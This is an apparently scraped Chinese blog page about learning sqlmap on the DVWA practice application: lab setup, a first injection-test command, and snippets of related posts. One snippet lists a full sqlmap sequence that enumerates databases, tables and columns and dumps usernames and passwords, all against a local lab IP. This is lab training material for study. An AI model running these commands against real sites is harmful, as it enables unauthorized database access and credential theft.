利用DVWA学习sqlmap(1)

最新推荐文章于 2025-06-25 09:34:54 发布
原创 最新推荐文章于 2025-06-25 09:34:54 发布 · 8.5k 阅读 · 18 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细介绍了如何在受害机器上配置DVWA环境,包括下载源代码、使用phpstudy搭建web服务以及修改配置文件。接着在攻击机kali上,通过ping测试靶机连通性,寻找SQL注入点并利用cookies进行会话保持。进一步,利用sqlmap获取数据库信息、表和列,最终提取出用户名与密码,展示了完整的SQL注入过程。

首先我们要在一台机器上配置dvwa环境

下载地址
https://github.com/ethicalhack3r/DVWA
把DVWA的源代码下载好之后,我们需要在受害机器上配置web服务,并配置dvwa
这里我使用的是phpstudy,因为它比较方便
把dvwa的源代码解压到phpstudy的www目录下,并到./config目录下修改配置文件把root和passwd修改为当前机器的数据库密码
打开dvwa,点击creatdatabase,成功之后修改安全等级为low
这样我们就完成了受害机器的配置。

第一步

接下来我们在攻击机器,我这里用的是kali,首先看看靶机能否ping通,然后我们第一步需要寻找注入点,这个可以利用工具寻找,不过我为了方便直接在靶机上点sql injection然后随便输入一个id
寻找注入点
然后我们尝试url注入能否成功

sqlmap -u "http://192.168.7.28/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#"
最低0.47元/天 解锁文章
DVWA-SQL注入(sqlmap安装和使用
weixin_53256941的博客
07-12 1094
一.Python环境安装 链接: https://pan.baidu.com/s/1ZbR6LoKcSvqnF82UZvkesg?pwd=e79b 提取码: e79b 双击安装包进行安装配置环境变量 我的电脑,找到属性点击高级系统设置 出现"系统属性",点击环境变量 在下面的"系统变量"里面找到Path变量点击编辑,(没有的话点击新建)在变量值末尾,填上python安装路径 win+R+cmd打开命令窗口输入python出现此页面表示安装成功 二.Sqlmap安装 链接:https://pan.baidu.
DVWA-SQL Injection 注入&Sqlmap
原味瓜子、的博客
09-22 541
文章目录SQL注入一、Low等级二、Medium等级三、High等级四、Impossible SQL注入 指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。 一、Low等级 1、漏洞分析 <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "SELECT
DVWA--SQL Injection(非盲注)--四个级别
1stPeak's Blog
10-29 1407
SQL 注入,是指攻击者通过注入恶意的SQL 命令,破坏SQL 查询语句的结构,从而达到执行恶意SQL 语句的目的。SQL 注入漏洞的危害是巨大的,常常会导致整个数据库被“脱裤“。尽管如此,SQL 注入仍是现在最常见的Web 漏洞之一 这里DVWA的SQL Injection(非盲注)共有四个等级 索引目录: Low Medium High Impossible ...
DVWA之SQL注入漏洞与SQLmap
leaf_lucky的博客
01-24 1120
对于以上两个语句,1=1会正常输出,而1=2 错误输出,可以说明SQL语句生效,SQL语句存在漏洞。用户输入SQL语句,执行了MySQL内置函数user(),database()而对于以下语句,可以发现没有语句,SQL语句变化,1!= 2,不能得到输出。输入上面的语句有正常输出,对于“#”的作用是注释后续SQL语句。点击第一个,找到cookie,复制下来,即是以下语句。上面语句为原本的SQL语句,下面语句为过滤后的语句。对于上面三句语句,依次进行判断,可以得到。输入1' order by 1#得到。
DVWA——SQL注入——sqlmap实现
weixin_46709219的博客
11-14 1695
网络安全-sqlmap学习笔记 sqlmap上面的总连接
sqlmap-----DVWA测试
weixin_30883271的博客
06-17 242
dvwa为例,难度简单,使用get方法请求 1.简单试探 sqlmap -u "http://10.2.4.120/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" 返回sqlmap got a 302 redirect to xxx ,是一个重定向,考虑是否需要加入cookie信息。 2.加入cookie ...
【渗透测试】 sqlmap工具注入-基于dvwa的sql injection_dvwa sql注入 sqlmap
2401_84968269的博客
05-13 1368
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
使用sqlmap完成sql注入DVWA
dongf2019的博客
12-12 1665
------------------------------------------------------------------------------------------------------运行结果。4、在kali中启动firefox浏览器,设置代理为127.0.0.1,端口为8080,访问dvwa的sql injection页面,输入1,submit。显示出users表格所以数据,其中用户密码已经从MD5还原为明文。2、启动dvwa,启动后地址为192.168.88.128。
Web安全 学习日记4 - DVWA sqlmap工具实现SQL注入
qq_46081990的博客
03-10 832
Medium 级别的表单通过 POST 方式提交,需要使用 --data 参数把数据引入过来,再改一下cookie,其余和 Low 级别一样。可以看到页面需要 cookie 来认证身份,通过 burpsuite 抓包得到 cookie。将 cookie 添加进去。
sqlmap自动化漏洞利用DVWA初、中、高)
qq_42620328的博客
10-14 1万+
sqlmap自动化漏洞利用DVWA
DVWA之LOW级别SQL注入---SQLMap使用
weixin_42465260的博客
08-05 7954
看到这篇文章,相信大家对于DVWA的搭建已经没问题了吧,在这里就不在赘述DVWA的搭建过程。 SQLMapdvwa简单使用实例: 一、首先肯定是要判断是否有注入漏洞,在输入框输入1,返回 ID: 1 First name: admin Surname: admin 返回正常; 再次输入1',报错,返回 You have an error in your SQL syntax...
dvwa php sql,DVWA SQL Injection之sqlmap使用
weixin_30313365的博客
03-18 291
使用神器sqlmap进行DVWA的SQL Injection需要注意的点:dvwa需要登录才能访问漏洞测试页面,所以使用sqlmap时需要提交登录后的cookie,cookie中有关于dvwa的security level设置属性,确保属性值是low(1)检测是否存在sql注入漏洞Sqlmap -u “http://127.0.0.1/DVWA-1.0.8/vulnerabilities/sqli...
sqlmapdvwa SQL Injection进行带cookie注入
m0_63283172的博客
02-27 992
sqlmapdvwa中输入点进行带cookie注入测试
使用Sqlmapdvwa进行sql注入测试(初级阶段)
fanxindong0620的博客
11-07 3596
0.测试准备 1)打开Kali虚拟机终端; 2)打开靶机OWASP,并通过浏览器,输入IP地址进入dvwa的主页,然后选择SQL injection进入SQL注入的测试页面 1.获取DVWA的url和cookie 在输入框中输入1,显示有内容,此时利用此URL进行SQL注入。 输入document.cookie获取页面的cookie。去除remem_token字段的内容,用于下文的sql注入终...
Web漏洞原理与利用—对于DVWA的简单使用
qq_69872924的博客
04-15 437
这篇文章主要是介绍DVWA的功能,主要为了了解SQL注入的概念和基本原理,XSS跨站的概念和基本原理,了解上传漏洞的概念和基本原理,掌握通过SQL注入进行攻击的基本方法,掌握通过XSS跨站进行攻击的基本方法,掌握通过上传漏洞进行攻击的基本方法等,帮助web开发者更好的理解web应用安全防范的过程。二:访问http://本机IP/DVWA/index.php,点击创建/重置数据库,点击创建数据库跳转到DVWA的登录界面,DVWA的默认用户名是"admin",密码“password”登录。
DVWA安装以及模块使用教程(一)
Estrus5的博客
04-30 1万+
一、DVWA介绍 DVWA(Damn Vulnerable Web Application)是randomstorm的一个开源项目。一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。 DVWA共有十个模块,分别是: 1.Brute Force(密码破解) 2.Command Injection(命令行注入) 3.CSRF(跨站请求伪造) 4.File Inclusion(文件包含) 5.F
操作指南和最佳实践:使用 DVWA 了解如何防止网站漏洞
weixin_43263566的博客
01-03 2786
网站漏洞与漏洞靶场(DVWA
一起学安全测试——用sqlmapdvwa实现SQL注入测试
热门推荐
灰蓝
03-29 2万+
sqlmap是一款进行SQL注入的工具,非常简单好用。我们在dvwa上试着用sqlmap实现注入,拿到数据库的信息。搭建dvwa环境并启动。 windows上需要搭建Python环境,下载sqlmap包并解压。kali linux自带(之后演示在kali上)。 设置dvwa级别为low(medium,high都可以,不要设成impossible就行) 打开dvwa的SQL Injection,打开浏
DVWA靶场搭建及使用(详细图文)
喜欢Python编程的程序员柚柚呀
06-25 573
***
dvwa使用sqlmap
最新发布
07-02
为了使用 sqlmapDVWA(Damn Vulnerable Web Application)进行 SQL 注入测试,可以按照以下步骤操作: 1. **确保环境准备就绪**: - 确保 DVWA 已经正确安装并运行在服务器上。 - 确保可以访问 DVWA 的 SQL 注入漏洞页面。通常情况下,该页面的 URL 类似于 `http://<dvwa_ip>/vulnerabilities/sqli/?id=1&Submit=Submit`。 2. **获取 Cookie 信息**: - 登录 DVWA获取会话 Cookie。DVWA 通常需要登录才能访问某些漏洞页面。可以通过浏览器开发者工具使用 `curl` 命令来获取 Cookie。 3. **检测 SQL 注入点**: - 使用 sqlmap 检测目标 URL 是否存在 SQL 注入漏洞。示例命令如下: ```bash sqlmap -u "http://192.168.88.138/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=q5bd6pv47cdq3rhugepne54lu4" ``` 这条命令将对指定 URL 进行 SQL 注入检测,并使用提供的 Cookie 来保持会话 [^2]。 4. **获取数据库信息**: - 如果检测到 SQL 注入漏洞,可以进一步获取数据库的相关信息,如数据库类型、版本等。例如: ```bash sqlmap -u "http://192.168.88.138/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=q5bd6pv47cdq3rhugepne54lu4" --banner ``` 5. **枚举数据库列表**: - 获取当前数据库服务器上的所有数据库名称: ```bash sqlmap -u "http://192.168.88.138/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=q5bd6pv47cdq3rhugepne54lu4" --dbs ``` 6. **枚举表名**: - 获取特定数据库中的所有表名。假设目标数据库为 `dvwa`: ```bash sqlmap -u "http://192.168.88.138/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=q5bd6pv47cdq3rhugepne54lu4" -D dvwa --tables ``` 7. **枚举列名**: - 获取某个表的所有列名。假设目标表为 `users`: ```bash sqlmap -u "http://192.168.88.138/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=q5bd6pv47cdq3rhugepne54lu4" -D dvwa -T users --columns ``` 8. **提取数据**: - 提取特定列的数据。例如,提取 `users` 表中 `user` 和 `password` 列的数据: ```bash sqlmap -u "http://192.168.88.138/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=q5bd6pv47cdq3rhugepne54lu4" -D dvwa -T users -C user,password --dump ``` 9. **自动化与批处理**: - 使用 `--batch` 参数可以让 sqlmap 在非交互模式下运行,自动选择默认选项。这适用于自动化脚本或快速测试: ```bash sqlmap -u "http://192.168.88.138/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=q5bd6pv47cdq3rhugepne54lu4" --batch ``` 10. **结果保存**: - 使用 `--output-dir` 参数指定输出目录,以保存 sqlmap 的所有输出结果: ```bash sqlmap -u "http://192.168.88.138/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=q5bd6pv47cdq3rhugepne54lu4" --output-dir=/path/to/output ``` 通过上述步骤,可以有效地利用 sqlmapDVWA 进行 SQL 注入测试,并获取数据库中的敏感信息 [^2]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值